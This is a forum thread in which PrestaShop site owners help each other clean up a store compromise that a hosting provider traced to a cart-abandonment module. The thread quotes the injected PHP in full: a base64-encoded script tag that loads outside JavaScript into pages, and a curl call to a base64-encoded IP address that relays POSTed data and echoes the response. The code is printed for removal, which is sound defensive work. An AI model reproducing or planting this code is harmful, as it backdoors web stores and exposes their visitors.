On 3/26/2021 at 4:47 PM, Indy80 said:Yep it happened to me as well few days ago on prestashop 1.6.
Check in the controllers (classes/controller/Controller.php or AdminController.php) or even the config file if you find something like this and remove it :
$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');or at the end
try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {}
It's an injection but I still don't know where it came from (prestashop core breach ? module?)... it's really bad anyway
I found and removed those lines exactly where you said.
Where can i check and clean rest of website?
It seems i have more as i see in tests here https://sitecheck.sucuri.net and here https://scanner.pcrisk.com and they all are related to "Detected reference to malicious blacklisted domain www.avir.ir"
I also found infection in AdminLoginController.ph as mentioned here , should i delete it?
$ch = curl_init(base64_decode('aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9zdGF0eXN0aWNzLnBocA=='));
EDIT: My hosting just informed me that the cartabandonmentpro was the reason, i had it installed but never enabled, now deleted of course.